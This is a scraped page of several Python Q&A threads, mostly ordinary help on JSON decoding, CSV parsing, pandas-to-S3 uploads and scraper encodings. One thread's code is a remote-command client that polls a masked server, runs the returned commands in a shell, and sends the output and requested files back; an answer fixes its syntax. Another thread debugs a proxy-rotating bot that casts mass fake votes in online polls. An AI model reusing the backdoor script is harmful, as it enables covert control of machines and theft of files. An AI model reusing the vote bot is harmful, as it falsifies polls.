I have some code that works when I run it on a Windows machine, but when it runs in Ubuntu on a Google Compute Engine VM I get the following error.
Traceback (most recent call last):
  File "firehose_get.py", line 43, in <module>
    print(json.dumps(json.loads(line),indent=2))
  File "/home/stuartkirkup/anaconda3/lib/python3.5/json/__init__.py", line 312, in loads
    s.__class__.__name__))
TypeError: the JSON object must be str, not 'bytes'
It's exactly the same code that runs fine on Windows. I've done quite a bit of reading and it looks like an encoding issue, and as you'll see from some of the commented-out sections in my code I've tried a few ways to change the encoding, but without joy. I've tried various things but can't work out how to debug it; I'm fairly new to Python.
I'm using Anaconda, which, according to some further reading, has an ill-advised setdefaultencoding hack built in.
Here is the stream header showing it's chunked data, which I believe is why it comes through as bytes:
{'Transfer-Encoding': 'chunked', 'Date': 'Thu, 17 Aug 2017 16:53:35 GMT', 'Content-Type': 'application/json', 'x-server': 'db220', 'Content-Encoding': 'gzip'}
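(Aside, not part of the original post: one quick way to confirm this is a bytes-versus-str problem is to print the type of the first non-empty line that comes out of iter_lines() before parsing it.)

for line in r.iter_lines():
    if line:
        print(type(line))  # prints <class 'bytes'> on Python 3, which json.loads rejects on 3.5
        break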
Code file - firehose_requests.py (with API key info replaced by ####)
import requests

MAX_REDIRECTS = 1000

def get(url, **kwargs):
    kwargs.setdefault('allow_redirects', False)
    for i in range(0, MAX_REDIRECTS):
        response = requests.get(url, **kwargs)
        #response.encoding = 'utf-8'
        print("test")
        print(response.headers)
        if response.status_code == requests.codes.moved or \
           response.status_code == requests.codes.found:
            if 'Location' in response.headers:
                url = response.headers['Location']
                content_type_header = response.headers.get('content_type')
                print(content_type_header)
                continue
            else:
                print("Error when reading the Location field from HTTP headers")
        return response
Code file - firehose_get.py
import json
import requests
from time import sleep
import argparse
#import ConfigParser
import firehose_requests
from requests.auth import HTTPBasicAuth

# Make it work for Python 2+3 and with Unicode
import io
try:
    to_unicode = unicode
except NameError:
    to_unicode = str

#request a token from Adobe
request_access_token = requests.post('https://api.omniture.com/token', data={'grant_type':'client_credentials'}, auth=HTTPBasicAuth('##############-livestream-poc','488##############1')).json()
#print(request_access_token)

#grab the token from the JSON returned
access_token = request_access_token["access_token"]
print(access_token)

url = 'https://livestream.adobe.net/api/1/stream/eecoukvanilla-##############'
sleep_sec = 0
rec_count = 10

bearer = "Bearer " + access_token
headers = {"Authorization": bearer, "accept-encoding": "gzip,deflate"}

r = firehose_requests.get(url, stream=True, headers=headers)

#open empty file
with open('output_file2.txt', 'w') as outfile:
    print('', file=outfile)

#Read the Stream
if r.status_code == requests.codes.ok:
    count = 0
    for line in r.iter_lines():
        if line:
            #write to screen
            print("\r\n")
            print(json.dumps(json.loads(line), indent=2))
            #append data to file
            with open('output_file2.txt', 'a') as outfile:
                print("\r\n", file=outfile)
                print(json.dumps(json.loads(line), ensure_ascii=False), file=outfile)
            #with io.open('output_file2.txt', 'w', encoding='utf8') as outfile:
            #    str_ = json.dumps(json.loads(line),
            #                      indent=4, sort_keys=True,
            #                      separators=(',', ': '), ensure_ascii=False)
            #    outfile.write(to_unicode(str_))
            #Break the loop if there is a -n argument
            if rec_count is not None:
                count = count + 1
                if count >= rec_count:
                    break
            #How long to wait between writes
            if sleep_sec is not None:
                sleep(sleep_sec)
else:
    print("There was a problem with the Request")
    print("Returned Status Code: " + str(r.status_code))
Thanks
OK, I worked it out. I found a lot of people also getting this error but no solutions posted, so this is how I did it.
Parse and decode the JSON like this:
json_parsed = json.loads(line.decode("utf-8"))
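For what it's worth (an alternative approach, not the one used above): from Python 3.6 onwards json.loads accepts bytes directly, and requests can decode each line itself if decode_unicode=True is passed to iter_lines:

for line in r.iter_lines(decode_unicode=True):  # yields str instead of bytes
    if line:
        json_parsed = json.loads(line)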
Full code:
import json
import requests
from time import sleep
import argparse
#import ConfigParser
import firehose_requests
from requests.auth import HTTPBasicAuth

# Make it work for Python 2+3 and with Unicode
import io
try:
    to_unicode = unicode
except NameError:
    to_unicode = str

#request a token from Adobe
request_access_token = requests.post('https://api.omniture.com/token', data={'grant_type':'client_credentials'}, auth=HTTPBasicAuth('##########-livestream-poc','488################1')).json()
#print(request_access_token)

#grab the token from the JSON returned
access_token = request_access_token["access_token"]
print(access_token)

url = 'https://livestream.adobe.net/api/1/stream/##################'
sleep_sec = 0
rec_count = 10

bearer = "Bearer " + access_token
headers = {"Authorization": bearer, "accept-encoding": "gzip,deflate"}

r = firehose_requests.get(url, stream=True, headers=headers)

#open empty file
with open('output_file.txt', 'w') as outfile:
    print('', file=outfile)

#Read the Stream
if r.status_code == requests.codes.ok:
    count = 0
    for line in r.iter_lines():
        if line:
            #parse and decode the JSON
            json_parsed = json.loads(line.decode("utf-8"))
            #write to screen
            #print (str(json_parsed))
            #append data to file
            with open('output_file.txt', 'a') as outfile:
                #write to file
                print(json_parsed, file=outfile)
            #Break the loop if there is a -n argument
            if rec_count is not None:
                count = count + 1
                if count >= rec_count:
                    break
            #How long to wait between writes
            if sleep_sec is not None:
                sleep(sleep_sec)
else:
    print("There was a problem with the Request")
    print("Returned Status Code: " + str(r.status_code))
Related
I'm really a hobbyist Python guy, so I don't know why it behaves like this. I think it should be working fine? Can someone explain to me why this is not working properly? I'm really lost. There are options with arguments: -v is the number of votes, -s the survey URL id, -t the target box that you want to check, found by getting its id from oid. It's based very much on code that I found on the internet. To me it all looks good, I guess. Could the problem be with the option type strings?
This is exactly what the code gives me in the terminal:
[#] Flushing usedProxies.txt file...
Traceback (most recent call last):
File "C:\Users\thefi\Desktop\Strawpoll-Voting-Bot-master\Main.py", line 76, in __init__
renewlist=self.renewProxyList();
File "C:\Users\thefi\Desktop\Strawpoll-Voting-Bot-master\Main.py", line 257, in renewProxyList
content = urllib.request.urlopen(url).read()
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 216, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 525, in open
response = meth(req, response)
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 634, in http_response
response = self.parent.error(
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 563, in error
return self._call_chain(*args)
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 496, in _call_chain
result = func(*args)
File "C:\Users\thefi\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 643, in http_error_default
raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 403: Forbidden
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\thefi\Desktop\Strawpoll-Voting-Bot-master\Main.py", line 266, in <module>
Strawpoll_Multivote()
File "C:\Users\thefi\Desktop\Strawpoll-Voting-Bot-master\Main.py", line 151, in __init__
print("[!] " + ex.strerror + ": " + ex.filename)
try:
    from optparse import OptionParser
    import sys
    import os
    import re
    from bs4 import BeautifulSoup
    import urllib.request
    import requests
    from selenium import webdriver
    from selenium.webdriver.common.by import By
    from selenium.webdriver.support.ui import WebDriverWait
    from selenium.webdriver.support import expected_conditions as EC
except ImportError as msg:
    print("[!] Library not installed: " + str(msg))
    exit()

class Strawpoll_Multivote:
    # Initialization
    maxVotes = 1
    voteFor = ""
    surveyId = ""
    domainEnd = "com"
    proxyListFile = "proxies.txt"
    saveStateFile = "usedProxies.txt"
    proxyTimeout = 10  # in seconds
    currentProxyPointer = 0
    successfulVotes = 0

    def __init__(self):
        try:
            # Parse Arguments
            parser = OptionParser()
            parser.add_option("-v", "--votes", action="store", type="string", dest="votes", help="number of times to vote")
            parser.add_option("-s", "--survey", action="store", type="string", dest="survey", help="url id of the survey")
            parser.add_option("-t", "--target", action="store", type="string", dest="target", help="checkbox id to vote for")
            parser.add_option("-d", "--domain", action="store", type="string", dest="domain", help="domain name end")
            parser.add_option("-f", "--flush", action="store_true", dest="flush", help="Flushes the used proxy list")
            parser.add_option("-r", "--renew", action="store_true", dest="renew", help="Renews the proxy list")
            (options, args) = parser.parse_args()

            if len(sys.argv) > 2:
                if options.votes is None:
                    print("[!] Times to vote not defined with: -v ")
                    exit(1)
                if options.survey is None:
                    print("[!] Url id of the survey defined with: -s")
                    exit(1)
                if options.target is None:
                    print("[!] Target checkbox to vote for is not defined with: -t")
                    exit(1)
                try:
                    self.maxVotes = int(options.votes)
                except ValueError:
                    print("[!] You incorrectly defined a non integer for -v")

                # Save arguments into global variable
                self.voteFor = options.target
                self.surveyId = options.survey

                # Flush usedProxies.txt
                if options.flush == True:
                    print("[#] Flushing usedProxies.txt file...")
                    os.remove(self.saveStateFile)
                    open(self.saveStateFile, 'w+')

                # Alter domain if not None.
                if options.domain is not None:
                    self.domainEnd = options.domain

                if options.renew == True:
                    renewlist=self.renewProxyList();
                    os.remove(self.proxyListFile)
                    with open(self.proxyListFile, "a") as myfile:
                        for i in renewlist:
                            myfile.write(i)

            # Print help
            else:
                print("[!] Not enough arguments given")
                print()
                parser.print_help()
                exit()

            # Read proxy list file
            alreadyUsedProxy = False
            proxyList = open(self.proxyListFile).read().split('\n')
            proxyList2 = None

            # Check if saveState.xml exists and read file
            if os.path.isfile(self.saveStateFile):
                proxyList2 = open(self.saveStateFile).read().split('\n')

            # Print remaining proxies
            if proxyList2 is not None:
                print("[#] Number of proxies remaining in old list: " + str(len(proxyList) - len(proxyList2)))
                print()
            else:
                print("[#] Number of proxies in new list: " + str(len(proxyList)))
                print()

            # Go through proxy list
            for proxy in proxyList:
                # Check if max votes has been reached
                if self.successfulVotes >= self.maxVotes:
                    break

                # Increase number of used proxy integer
                self.currentProxyPointer += 1

                # Read in saveState.xml if this proxy has already been used
                if proxyList2 is not None:
                    for proxy2 in proxyList2:
                        if proxy == proxy2:
                            alreadyUsedProxy = True
                            break

                # If it has been used print message and continue to next proxy
                if alreadyUsedProxy == True:
                    print("[" + str(self.currentProxyPointer) + "] Skipping proxy: " + proxy)
                    alreadyUsedProxy = False
                    continue

                # Print current proxy information
                print("[" + str(self.currentProxyPointer) + "] New proxy: " + proxy)
                print("[#] Connecting... ")

                # Connect to strawpoll and send vote
                # self.sendToWeb('http://' + proxy,'https://' + proxy)
                self.webdriverManipulation(proxy);

                # Write used proxy into saveState.xml
                self.writeUsedProxy(proxy)
                print()

            # Check if max votes has been reached
            if self.successfulVotes >= self.maxVotes:
                print("[*] Finished voting: " + str(self.successfulVotes) + ' times.')
            else:
                print("[*] Finished every proxy in the list.")
            exit()

        except IOError as ex:
            print("[!] " + ex.strerror + ": " + ex.filename)
        except KeyboardInterrupt as ex:
            print("[#] Ending procedure...")
            print("[#] Programm aborted")
            exit()

    def writeUsedProxy(self, proxyIp):
        if os.path.isfile(self.saveStateFile):
            with open(self.saveStateFile, "a") as myfile:
                myfile.write(proxyIp + "\n")

    def getIp(self, httpProxy):
        proxyDictionary = {"https": httpProxy}
        request = requests.get("https://api.ipify.org/", proxies=proxyDictionary)
        requestString = str(request.text)
        return requestString

    # Using selenium and chromedriver to run the voting process in the background
    def webdriverManipulation(self, Proxy):
        try:
            WINDOW_SIZE = "1920,1080"
            chrome_options = webdriver.ChromeOptions()
            chrome_options.add_argument("--headless")
            chrome_options.add_argument("--window-size=%s" % WINDOW_SIZE)
            chrome_options.add_argument('--proxy-server=%s' % Proxy)
            prefs = {"profile.managed_default_content_settings.images": 2}
            chrome_options.add_experimental_option("prefs", prefs)
            chrome = webdriver.Chrome(options=chrome_options)

            if self.domainEnd == "me":
                chrome.get('https://www.strawpoll.' + self.domainEnd + '/' + self.surveyId)
                element = chrome.find_element_by_xpath('//*[@value="' + self.voteFor + '"]')
                webdriver.ActionChains(chrome).move_to_element(element).click(element).perform()
                submit_button = chrome.find_elements_by_xpath('//*[@type="submit"]')[0]
                submit_button.click()
            else:
                chrome.get('https://strawpoll.' + self.domainEnd + '/' + self.surveyId)
                element = chrome.find_element_by_xpath('//*[@name="' + self.voteFor + '"]')
                webdriver.ActionChains(chrome).move_to_element(element).click(element).perform()
                submit_button = chrome.find_elements_by_xpath('//*[@id="votebutton"]')[0]
                submit_button.click()

            chrome.quit()
            print("[*] Successfully voted.")
            self.successfulVotes += 1
            return True
        except Exception as exception:
            print("[!] Voting failed for the specific proxy.")
            chrome.quit()
            return False

    # Posting through requests (previous version)
    def sendToWeb(self, httpProxy, httpsProxy):
        try:
            headers = \
                {
                    'Host': 'strawpoll.' + self.domainEnd,
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',
                    'Accept': '*/*',
                    'Accept-Language': 'en - us, en; q = 0.5',
                    'Accept-Encoding': 'gzip, deflate',
                    'Accept-Charset': 'ISO - 8859 - 1, utf - 8; = 0.7, *;q = 0.7',
                    'Referer': 'https://strawpoll.' + self.domainEnd + '/' + self.surveyId,
                    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
                    'X-Requested-With': 'XMLHttpRequest',
                    'Content-Length': '29',
                    'Cookie': 'lang=en',
                    'DNT': '1',
                    'Connection': 'close'
                }
            payload = {'pid': self.surveyId, 'oids': self.voteFor}
            proxyDictionary = {"http": httpProxy, "https": httpsProxy}

            # Connect to server
            r = requests.post('https://strawpoll.' + self.domainEnd + '/vote', data=payload, headers=headers)
            json = r.json()

            # Check if the vote was successful
            if (bool(json['success'])):
                print("[*] Successfully voted.")
                self.successfulVotes += 1
                return True
            else:
                print("[!] Voting failed.")
                return False
        except requests.exceptions.Timeout:
            print("[!] Timeout")
            return False
        except requests.exceptions.ConnectionError:
            print("[!] Couldn't connect to proxy")
            return False
        except Exception as exception:
            print(str(exception))
            return False

    # Renew Proxy List
    def renewProxyList(self):
        final_list = []
        url = "http://proxy-daily.com/"
        content = urllib.request.urlopen(url).read()
        soup = BeautifulSoup(content, features="html5lib")
        center = soup.find_all("center")[0]
        div = center.findChildren("div", recursive=False)[0].getText();
        children = div.splitlines()
        for child in children:
            final_list.append(child + "\n")
        return (final_list)

# Execute strawpoll_multivote
Strawpoll_Multivote()
The error is descriptive: one of the parts you are attempting to concatenate in your log message is a None object, and the "+" operator is not defined between str and None.
However, concatenating strings with "+" in Python is usually only done by people learning Python who are coming from other languages. Other ways of interpolating data into strings are far easier to type and read.
From Python 3.6+ the recommended way is interpolating with f-strings: strings with an f prefix before the opening quote can resolve Python expressions placed inside curly braces within them.
So, just replace your erroring line with:
print(f"[!] { ex.strerror }: { ex.filename}")
Unlike the + operator, string interpolation via f-strings, the % operator or the .format method will automatically cast its operands to string, so None will not raise an error.
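A minimal illustration of the difference (with made-up values standing in for ex.strerror and ex.filename):

ex_strerror = "No such file or directory"
ex_filename = None  # this is the piece that breaks the original print
# print("[!] " + ex_strerror + ": " + ex_filename)  # TypeError: can only concatenate str (not "NoneType") to str
print(f"[!] {ex_strerror}: {ex_filename}")          # prints: [!] No such file or directory: None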
I'm trying to download and iterate over a CSV file, but I only ever read the headers and no lines after them.
I tried using this answer but with no luck.
This is my code:
from datetime import datetime
import requests
import csv

def main():
    print("python main function")
    datetime_object = datetime.now().date()
    url = f'https://markets.cboe.com/us/equities/market_statistics/volume_reports/day/{datetime_object}/csv/?mkt=bzx'
    print(url)
    response = requests.get(url, stream=True)
    csv_content = response.content.decode('utf-8')
    print(csv_content)
    cr = csv.reader(csv_content.splitlines(), delimiter='~')
    my_list = list(cr)
    for row in my_list:
        print(row)

if __name__ == '__main__':
    main()
cr = csv.reader(csv_content.splitlines(), delimiter='~')
change to
cr = csv.reader(csv_content.splitlines(), delimiter=',')
And check whether you downloaded the full file or a file with only the header by opening the URL in a browser ;)
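If you'd rather not hard-code the delimiter at all, csv.Sniffer can usually guess it from a sample of the content (a sketch, assuming the downloaded text fits the sniffer's heuristics):

import csv

dialect = csv.Sniffer().sniff(csv_content[:1024])  # inspect the first chunk to guess the delimiter
cr = csv.reader(csv_content.splitlines(), dialect)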
The objective of this code is to read an existing CSV file from a specified S3 bucket into a DataFrame, filter the DataFrame for the desired columns, and then write the filtered DataFrame to a CSV object using StringIO that I can upload to a different S3 bucket.
Everything works right now except the code block for the function "prepare_file_for_upload". Below is the full code block:
from io import StringIO
import io  # unused at the moment
import logging
import pandas as pd
import boto3
from botocore.exceptions import ClientError

FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)

#S3 parameters
source_bucket = 'REPLACE'
source_folder = 'REPLACE/'
dest_bucket = 'REPLACE'
dest_folder = 'REPLACE'
output_name = 'REPLACE'

def get_file_name():
    try:
        s3 = boto3.client("s3")
        logging.info(f'Determining filename from: {source_bucket}/{source_folder}')
        bucket_path = s3.list_objects(Bucket=source_bucket, Prefix=source_folder)
        file_name = [key['Key'] for key in bucket_path['Contents']][1]
        logging.info(file_name)
        return file_name
    except ClientError as e:
        logging.info(f'Unable to determine file name from bucket {source_bucket}/{source_folder}')
        logging.info(e)

def get_file_data(file_name):
    try:
        s3 = boto3.client("s3")
        logging.info(f'file name from get data: {file_name}')
        obj = s3.get_object(Bucket=source_bucket, Key=file_name)
        body = obj['Body']
        body_string = body.read().decode('utf-8')
        file_data = pd.read_csv(StringIO(body_string))
        #logging.info(file_data)
        return file_data
    except ClientError as e:
        logging.info(f'Unable to read {file_name} into dataframe')
        logging.info(e)

def filter_file_data(file_data):
    try:
        all_columns = list(file_data.columns)
        columns_used = ('col_1', 'col_2', 'col_3')
        desired_columns = [x for x in all_columns if x in columns_used]
        filtered_data = file_data[desired_columns]
        logging.info(type(filtered_data))  #for testing
        return filtered_data
    except Exception as e:
        logging.info('Unable to filter file')
        logging.info(e)
The block below is where I am stuck: it is where I attempt to write the existing DataFrame that was passed to the function using the "to_csv" method with StringIO instead of creating a local file. to_csv will write to a local file but does not work with the buffer (yes, I tried moving the buffer cursor to the start position afterwards and still nothing).
def prepare_file_for_upload(filtered_data):  #this is the function block where I am stuck
    try:
        buffer = StringIO()
        output_name = 'FILE_NAME.csv'
        #code below is writing to file but can not get to write to buffer
        output_file = filtered_data.to_csv(buffer, sep=',')
        df = pd.DataFrame(buffer)  #for testing
        logging.info(df)  #for testing
        return output_file
    except Exception as e:
        logging.info(f'Unable to prepare {output_name} for upload')
        logging.info(e)

def upload_file(adjusted_file):
    try:
        #dest_key = f'{dest_folder}/{output_name}'
        dest_key = f'{output_name}'
        s3 = boto3.resource('s3')
        s3.meta.client.upload_file(adjusted_file, dest_bucket, dest_key)
    except ClientError as e:
        logging.info(f'Unable to upload {output_name} to {dest_key}')
        logging.info(e)

def execute_program():
    file_name = get_file_name()
    file_data = get_file_data(file_name)
    filtered_data = filter_file_data(file_data)
    adjusted_file = prepare_file_for_upload(filtered_data)
    upload_file = upload_file(adjusted_file)

if __name__ == '__main__':
    execute_program()
The following solution worked for me:
csv_buffer = StringIO()
output_file = filtered_data.to_csv(csv_buffer)
s3_resource = boto3.resource('s3')
s3_resource.Object(dest_bucket, output_name).put(Body=csv_buffer.getvalue())
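To slot that into the structure above, one option (a sketch that reuses the existing variable names, not the poster's final code) is to have prepare_file_for_upload return the CSV text and have upload_file put() it directly, since upload_file() on the client expects a path on the local disk:

def prepare_file_for_upload(filtered_data):
    # Serialize the filtered DataFrame into an in-memory CSV string
    csv_buffer = StringIO()
    filtered_data.to_csv(csv_buffer, index=False)
    return csv_buffer.getvalue()

def upload_file(adjusted_file):
    # Write the CSV string straight to the destination bucket; no temp file needed
    s3 = boto3.resource('s3')
    s3.Object(dest_bucket, output_name).put(Body=adjusted_file)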
When working with a BytesIO object, pay careful attention to the order of operations. In your code, you instantiate the BytesIO object and then fill it via a call to to_csv(). So far so good. But one thing to manage when working with a BytesIO object, unlike a file workflow, is the stream position.
After writing data to the stream, the stream position is at the end of the stream. If you try to read from that position, you will read nothing! The operation will complete, leaving you scratching your head about why no results are written to S3. Add a call to seek() with the argument 0 to your function. Here is a demo program:
from io import BytesIO
import boto3
import pandas
from pandas import util

df = util.testing.makeMixedDataFrame()
s3_resource = boto3.resource("s3")
buffer = BytesIO()
df.to_csv(buffer, sep=",", index=False, mode="wb", encoding="UTF-8")

# The following call to `tell()` returns the stream position. 0 is the beginning of the file.
buffer.tell()
# >> 134

# Reposition the stream to the beginning by calling `seek(0)` before uploading
buffer.seek(0)
s3_resource.Object("test-bucket", "test_df_from_resource.csv").put(Body=buffer.getvalue())
You should get a response similar to the following (with actual values):
>> {'ResponseMetadata': {'RequestId': 'request-id-value',
'HostId': '###########',
'HTTPStatusCode': 200,
'HTTPHeaders': {'x-amz-id-2': '############',
'x-amz-request-id': '00000',
'date': 'Tue, 31 Aug 2021 00:00:00 GMT',
'x-amz-server-side-encryption': 'value',
'etag': '"xxxx"',
'server': 'AmazonS3',
'content-length': '0'},
'RetryAttempts': 0},
'ETag': '"xxxx"',
'ServerSideEncryption': 'value'}
Changing the code to move the stream position should solve the issues you were facing. It is also worth mentioning that Pandas had a bug that caused unexpected behavior when writing to a bytes object. It was fixed, and the sample I provided assumes you are running a version of Python greater than 3.8 and a version of Pandas greater than 1.3.2. Further information on IO can be found in the Python documentation.
I am trying to send a file using the post method of the requests module in Python 3.5, and I am getting an error saying "invalid syntax" on these lines:
files = ('file':open(path,'rb'))
r = requests.post(('htttp://#########', files= files))
Full code is as follows.
import requests
import subprocess
import time
import os

while True:
    req = requests.get('htttp://########')
    command = req.text
    if 'terminate' in command:
        break
    elif 'grab' in command:
        grab,path = command.split('*')
        if os.path.exists(path):
            url = 'http://#########/store'
            files = ('file':open(path,'rb'))
            r = requests.post(('htttp://#########', files= files))
        else:
            post_request = requests.post(url='htttp://#########', data='[-] Unable to find file !')
    else:
        CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE, stdout=subprocess.PIPE)
        post_request = requests.post(url='htttp://########', data=CMD.stdout.read())
        post_request = requests.post(url='htttp://######', data=CMD.stderr.read())
    time.sleep(3)
You probably want this:
files = {'file': open(path, 'rb')}
r = requests.post('htttp://#########', files=files)
Dicts are created using curly braces, not parentheses, and you had extra parentheses around the parameters in your call to requests.post.
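As a usage note (with the same redacted placeholder URL as above), it is also worth opening the file in a with block so the handle is closed once the upload finishes:

with open(path, 'rb') as f:
    files = {'file': f}
    r = requests.post('htttp://#########', files=files)  # placeholder URL copied from above
print(r.status_code)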
I've almost finished writing my first scraper!
I've run into a snag, however: I can't seem to grab the contents of posts that contain a table (posts that cite another post, in other words).
This is the code that extracts post contents from the soup object. It works just fine:
def getPost_contents(soup0bj):
    try:
        soup0bj = (soup0bj)
        post_contents = []
        for content in soup0bj.findAll('', {'class' : 'post_content'}, recursive = 'True'):
            post_contents.append(content.text.strip())
    ...#Error management
    return (post_contents)
Here's an example of what I need to scrape (highlighted in yellow):
Problem post
(URL, just in case: http://forum.doctissimo.fr/sante/diabete/savoir-diabetique-sujet_170840_1.htm#t657906)
How do I get the contents that I've highlighted? And why does my current getPostcontents function not work in this particular instance? As far as I can see, the strings are still under div class=post_contents.
EDIT EDIT EDIT
This is how I am getting my BeautifulSoup:
from bs4 import BeautifulSoup as Soup
def getHTMLsoup(url):
    try:
        html = urlopen(url)
    ...#Error management
    try:
        soup0bj = Soup(html.read().decode('utf-8', 'replace'))
        time.sleep(5)
    ...#Error management
    return (soup0bj)
EDIT2 EDIT2 EDIT2
These are the relevant bits of the scraper: (Sorry about the dump!)
from bs4 import BeautifulSoup as Soup
from urllib.request import urlopen, urlretrieve
from urllib.error import HTTPError, URLError
import time, re
def getHTMLsoup(url):
    try:
        html = urlopen(url)
    except HTTPError as e:
        return None
        print('The server hosting{} is unavailable.'.format(url), '\n')
        print('Trying again in 10 minutes...','\n')
        time.sleep(600)
        getHTMLsoup(url)
    except URLError as e:
        return None
        print('The webpage found at {} is unavailable.'.format(url),'\n')
        print('Trying again in 10 minutes...','\n')
        time.sleep(600)
        getHTMLsoup(url)
    try:
        soup0bj = Soup(html.read().decode('utf-8', 'replace'))
        time.sleep(5)
    except AttributeError as e:
        return None
        print("Ooops, {}'s HTML structure wasn't detected.".format(url),'\n')
    return soup0bj

def getMessagetable(soup0bj):
    try:
        soup0bj = (soup0bj)
        messagetable = []
        for data in soup0bj.findAll('tr', {'class' : re.compile('message.*')}, recursive = 'True'):
            messagetable.append(data)  # assumed loop body: collect each matching row
    except AttributeError as e:
        print(' ')
    return (messagetable)

def getTime_stamps(soup0bj):
    try:
        soup0bj = (soup0bj)
        time_stamps = []
        for stamp in soup0bj.findAll('span', {'class' : 'topic_posted'}):
            time_stamps.append(re.search('..\/..\/20..', stamp.text).group(0))
    except AttributeError as e:
        print('No time-stamps found. Moving on.','\n')
    return (time_stamps)

def getHandles(soup0bj):
    try:
        soup0bj = (soup0bj)
        handles = []
        for handle in soup0bj.findAll('span', {'data-id_user' : re.compile('.*')}, limit = 1):
            handles.append(handle.text)
    except AttributeError as e:
        print("")
    return (handles)

def getPost_contents(soup0bj):
    try:
        soup0bj = (soup0bj)
        post_contents = []
        for content in soup0bj.findAll('div', {'class' : 'post_content'}, recursive = 'True'):
            post_contents.append(content.text.strip())
    except AttributeError as e:
        print('Ooops, something has gone wrong!')
    return (post_contents)

html = ('http://forum.doctissimo.fr/sante/diabete/savoir-diabetique-sujet_170840_1.htm')

for soup in getHTMLsoup(html):
    for messagetable in getMessagetable(soup):
        print(getTime_stamps(messagetable),'\n')
        print(getHandles(messagetable),'\n')
        print(getPost_contents(messagetable),'\n')
The problem is your decoding: it is not utf-8. If you remove the "replace", your code will error with:
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe9 in position 253835: invalid continuation byte
The data seems to be latin-1 encoded; decoding as latin-1 causes no errors, but the output does look off in certain parts. Using
html = urlopen(r).read().decode("latin-1")
will work but as I mentioned, you get weird output like:
"diabète en cas d'accident de la route ou malaise isolÊ ou autre ???"
Another option would be to pass an accept-charset header:
from urllib.request import Request, urlopen
headers = {"accept-charset":"utf-8"}
r = Request("http://forum.doctissimo.fr/sante/diabete/savoir-diabetique-sujet_170840_1.htm#t657906",headers=headers)
html = urlopen(r).read()
I get the exact same encoding issue using requests and letting it handle the encoding; it is like the data has mixed encoding, some utf-8 and some latin-1. The headers returned by requests show the content-encoding as gzip:
'Content-Encoding': 'gzip'
If we specify that we want gzip and decode:
from urllib.request import Request, urlopen
headers = {"Accept-Encoding":"gzip"}
r = Request("http://forum.doctissimo.fr/sante/diabete/savoir-diabetique-sujet_170840_1.htm#t657906",headers=headers)
r = urlopen(r)
import gzip
gzipFile = gzip.GzipFile(fileobj=r)
print(gzipFile.read().decode("latin-1"))
We get the same errors with utf-8 and the same weird output decoding to latin-1. Interestingly, in Python 2 both requests and urllib work fine.
Using chardet:
r = urlopen(r)
import chardet
print(chardet.detect(r.read()))
reckons with around 71 percent confidence that it is ISO-8859-2 but that again gives the same bad output.
{'confidence': 0.711104254322944, 'encoding': 'ISO-8859-2'}
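One more option worth trying (my suggestion, not something tested against this page): hand BeautifulSoup the raw, undecoded bytes and let its built-in UnicodeDammit detection choose the charset, then check what it settled on:

import requests
from bs4 import BeautifulSoup

url = "http://forum.doctissimo.fr/sante/diabete/savoir-diabetique-sujet_170840_1.htm"
raw = requests.get(url).content           # undecoded bytes; requests un-gzips transparently
soup = BeautifulSoup(raw, "html.parser")  # bs4 guesses the encoding via UnicodeDammit
print(soup.original_encoding)             # shows which charset was chosen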